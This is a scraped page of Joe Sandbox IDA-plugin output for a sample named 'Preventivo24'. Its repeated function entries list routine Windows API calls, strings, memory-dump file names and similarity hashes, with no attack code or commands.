Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$AddressConditionDirectoryMessageProcSendSystemVariableWake
String ID: SetWindowTheme$UxTheme.dll$explorer
API String ID: 1065053019-3123591815
Opcode ID: a0e29de01b7a03210676f387bdd6913a02dd2925eb595dbf50a34aa15e79e6a0
Instruction ID: 94226e87e27056e54f88103a699e9f28e487c6f67192820035832bc37e3ef31f
Opcode Fuzzy Hash: a0e29de01b7a03210676f387bdd6913a02dd2925eb595dbf50a34aa15e79e6a0
Instruction Fuzzy Hash: E021F0B1A41B45AFC720DF64EC46F9AB7A4EB10B21F500325FA21EB3E4D7746900CB66

Uniqueness

Uniqueness Score: -1.00%

Function 009FEC80 Relevance: 7.8, APIs: 5, Instructions: 306COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00D3001C,26FBC52C,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00C16085), ref: 009FECEA
GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00C16085), ref: 009FED64

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CriticalEnterFileModuleNameSection
String ID:
API String ID: 764724386-0
Opcode ID: 4b2016f7cfece310c12527df6c3d32b12e1b0a4906e8f8c91034ffd40a9123d7
Instruction ID: b9c473e8cbb6132e69837434690a2751e05eea200797259d67b582bde473f5e8
Opcode Fuzzy Hash: 4b2016f7cfece310c12527df6c3d32b12e1b0a4906e8f8c91034ffd40a9123d7
Instruction Fuzzy Hash: E7C17A31A0425DDFDB11CF68D884BAEBBB8BF48314F144169E905EB3A1CB75AD45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009F9200 Relevance: 7.6, APIs: 5, Instructions: 132windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 009F925F
GetDlgItem.USER32(?,?), ref: 009F9284
SendMessageW.USER32(?,?,?,?), ref: 009F9358

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ItemMessageSendWindow
String ID:
API String ID: 799199299-0
Opcode ID: d3665e49edb37d7c8f15f63475031d56acfd9cf0aba85fa20feb84609963cfb0
Instruction ID: cc9370c436dda4c91119d6c662b0bcad06dba6cbf94f865ea8e5e6adad835559
Opcode Fuzzy Hash: d3665e49edb37d7c8f15f63475031d56acfd9cf0aba85fa20feb84609963cfb0
Instruction Fuzzy Hash: 3241D632304209EFC7188F18D894FB6B7A9FB85355F14492AF65AC76A1DB62EC10DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00B16C50 Relevance: 7.6, APIs: 5, Instructions: 125COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B16C84
std::_Lockit::_Lockit.LIBCPMT ref: 00B16CA6
std::_Lockit::~_Lockit.LIBCPMT ref: 00B16CCE
std::_Facet_Register.LIBCPMT ref: 00B16DB7
std::_Lockit::~_Lockit.LIBCPMT ref: 00B16DEB

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 41788bd6f509485b21adeabfbb0b9973b512c24bdc7087d17336ebaa4ed0afc6
Instruction ID: 913db3508a49c734976a9151e8c56bba1fece72bf91ed74a6c7a5f9f368767c8
Opcode Fuzzy Hash: 41788bd6f509485b21adeabfbb0b9973b512c24bdc7087d17336ebaa4ed0afc6
Instruction Fuzzy Hash: C5519EB0A00689DFDB01CF58D881BEEBBF4FF10314F6441A9D815AB391DBB5AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B5E190 Relevance: 7.6, APIs: 5, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00B5E190,80000000,00000000,00000000,00000003,00000080,00000000,26FBC52C,?,00B5E190), ref: 00B5E1CC
GetLastError.KERNEL32 ref: 00B5E1EA
ReadFile.KERNEL32(00000000,26FBC52C,00000004,00B5E190,00000000), ref: 00B5E200
GetLastError.KERNEL32 ref: 00B5E20A
CloseHandle.KERNEL32(00000000), ref: 00B5E229

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleRead
String ID:
API String ID: 3160720760-0
Opcode ID: f6f69edb51e2085e7d73d8682a1fb99545b42d1ec257ac3ab4ac28283f9508a5
Instruction ID: a857e9d6047c3d64c51b6588c17235c5d907aba720bcf4d253e3b73ccf1e4ef8
Opcode Fuzzy Hash: f6f69edb51e2085e7d73d8682a1fb99545b42d1ec257ac3ab4ac28283f9508a5
Instruction Fuzzy Hash: B211B271A44209ABDB308F58DD05B6EBBF8FB05B20F2043A9FD25E72D0D7B15A048B91

Uniqueness

Uniqueness Score: -1.00%

Function 009F26C0 Relevance: 7.6, APIs: 5, Instructions: 60memorywindowCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 009F270A
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 009F2710
FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 009F2733
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00C13BA6,000000FF), ref: 009F275B
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,00C13BA6,000000FF), ref: 009F2761

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Heap$FreeProcess$FormatMessage
String ID:
API String ID: 1606019998-0
Opcode ID: 0f2b1ac258b957131bc955910df436bf4db9306d2eb73de7f45aa5a994fdd528
Instruction ID: ee67cc42caf9082b52a7868b7ce8f7d7d2d6e1b0c0e31af8071bf80f2c25107a
Opcode Fuzzy Hash: 0f2b1ac258b957131bc955910df436bf4db9306d2eb73de7f45aa5a994fdd528
Instruction Fuzzy Hash: EB1130B1A44259ABEB10EF94CC46BAFBBBCEB04B54F100559F510A72C1DBB5A9048BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A0E1B0 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00A0E1BA
SendMessageW.USER32(?,?,?,0000102B), ref: 00A0E211
SendMessageW.USER32(?,?,?,0000102B), ref: 00A0E264
SendMessageW.USER32(?,00001043,00000000,00000000), ref: 00A0E279
SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00A0E28A

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 8256faa640bade99ef38c2c8348854ffb7477a25198188e013bbbeec3fbb034c
Instruction ID: bc0bbeeed89e7319e26fe834d6bdb0b3dc67a055738e911e970bb8f7766dc4bb
Opcode Fuzzy Hash: 8256faa640bade99ef38c2c8348854ffb7477a25198188e013bbbeec3fbb034c
Instruction Fuzzy Hash: BE213E31858786E7D320CF00DD45B5ABBE5BFDD718F206B0EF180611D4EBB195849A5A

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A840 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,RichEdit20W,?,?,00000000,80000000,00000000,00000000,00000000,00000000,00000000), ref: 00A1AA1B
SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00A1AA2A
SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00A1AA36

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

Strings

RichEdit20W, xrefs: 00A1AA13

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: MessageSend$AllocateCreateHeapWindow
String ID: RichEdit20W
API String ID: 2359350451-4173859555
Opcode ID: 4ec5d7d8d757f3b95db26e940ee09646bb62470e1d8d779e5c542c2e3aa37d8c
Instruction ID: 3610b3c25c32effe72b4d255cfbc1c3d4d3de9afc01b8f4b0de465f190127475
Opcode Fuzzy Hash: 4ec5d7d8d757f3b95db26e940ee09646bb62470e1d8d779e5c542c2e3aa37d8c
Instruction Fuzzy Hash: 4AC17B71E002189FCB15DFA8C894BEEBBF5EF48310F14416AE815AB3A1DB75AD41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00A14BD0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 234windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

Part of subcall function 00AF90D0: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,00000000,?,00A0D728,?,80004005,?), ref: 00AF9157
Part of subcall function 00AF90D0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AF9191

SendMessageW.USER32(?,00001036,00000004,00000004), ref: 00A14DA1
SendMessageW.USER32(?,00001036,00000400,00000400), ref: 00A14DBC
SendMessageW.USER32(?,00001061,00000000,?), ref: 00A14E1C

Strings

QuickSelectionList, xrefs: 00A14CB8, 00A14CCA, 00A14CD4

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: MessageSend$AllocateHeapWindow
String ID: QuickSelectionList
API String ID: 3168177373-3633591268
Opcode ID: 0bf1c2e966a5e26171e13eeefc56a863b041e5ece44c999b7b6482b164260b8a
Instruction ID: 9bb15feb2d96fa4ba176ddb16f05096039d4015cce1ccabf39a98c6785012c3e
Opcode Fuzzy Hash: 0bf1c2e966a5e26171e13eeefc56a863b041e5ece44c999b7b6482b164260b8a
Instruction Fuzzy Hash: A3817D71A002199FCB04DF68D884BAEBBF5FF88324F144529F915A7391DB74A944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B57970 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,26FBC52C,?,80000002,80000002), ref: 00B579C3
CloseHandle.KERNEL32(?,26FBC52C,80000002,?,00000000,00C60E53,000000FF,?,80004005,?,80000002), ref: 00B57B60
CloseHandle.KERNEL32(00000001,26FBC52C,80000002,?,00000000,00C60E53,000000FF,?,80004005,?,80000002), ref: 00B57B8F

Strings

LOG, xrefs: 00B57A37

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CloseHandle$FileModuleName
String ID: LOG
API String ID: 3884789274-429402703
Opcode ID: 3c3bbd77be14d0b5ef5fcf76f99ed10c4c875495d170f947a49d993f7f9a902d
Instruction ID: 3e3b6030a4e27bcb981b9f7962b9f635d4fa0e3d32266356fc8a62d4e4eb5525
Opcode Fuzzy Hash: 3c3bbd77be14d0b5ef5fcf76f99ed10c4c875495d170f947a49d993f7f9a902d
Instruction Fuzzy Hash: 7261C371644248DFDB25DF28D844BAEB7F5FF44710F104AA9EC1ADB790EB749A088B90

Uniqueness

Uniqueness Score: -1.00%

Function 00B68900 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,26FBC52C), ref: 00B68937

Part of subcall function 00B04450: MultiByteToWideChar.KERNEL32(00000003,00000000,00B47294,000000FF,00000000,00000000,00000000,?,?,00B47294,00CA47A0), ref: 00B04468
Part of subcall function 00B04450: MultiByteToWideChar.KERNEL32(00000003,00000000,00B47294,000000FF,?,-00000001,?,00B47294,00CA47A0), ref: 00B0449A

Strings

.pack, xrefs: 00B68CC1
*.*, xrefs: 00B689CD, 00B689E8
.jar, xrefs: 00B68D9F

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiWide$ObjectSingleWait
String ID: *.*$.jar$.pack
API String ID: 3339361032-3892993289
Opcode ID: 8a3f54062f7bbf220ce289136651299ff51b046f481f60e659f6bf036db04ed6
Instruction ID: 134e761074b2a14663ea2cf4e1e3e47d9a17da86f141600f9591272d51b2fe03
Opcode Fuzzy Hash: 8a3f54062f7bbf220ce289136651299ff51b046f481f60e659f6bf036db04ed6
Instruction Fuzzy Hash: FF617271A006199FCB04DFA8C894BAEB7F5FF48324F1442A9E825A7391DB34AD01CF91

Uniqueness

Uniqueness Score: -1.00%

Function 009F2AA0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 009F2AE4
GetProcAddress.KERNEL32(00000000,combase.dll), ref: 009F2AEA

Strings

combase.dll, xrefs: 009F2ADF
RoOriginateLanguageException, xrefs: 009F2ADA

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoOriginateLanguageException$combase.dll
API String ID: 2574300362-3996158991
Opcode ID: 428336397d3f27737f098ac26db37eafe037b13e26ce1a46773ac6ebb37a4ae7
Instruction ID: be834dd4b5612f080c734c8fd9dbcadc2971565ec084edc74ed29f2703c25609
Opcode Fuzzy Hash: 428336397d3f27737f098ac26db37eafe037b13e26ce1a46773ac6ebb37a4ae7
Instruction Fuzzy Hash: 60319A7190021D9BCB21DFA4C915BFEBBB8FB41764F10022AE911B72D0DBB45A44CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00AF8FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF9580: GetProcAddress.KERNEL32(SetWindowTheme), ref: 00AF964D
Part of subcall function 00AF9580: SendMessageW.USER32(?,00001036,00010000,00010000), ref: 00AF9698

CreateWindowExW.USER32(80000000,SysListView32,?,00000000,?,80000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AF9022
SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00AF903A
SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00AF9046

Part of subcall function 009FA370: SetWindowLongW.USER32(?,000000FC,00000000), ref: 009FA3B2

Strings

SysListView32, xrefs: 00AF9019

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

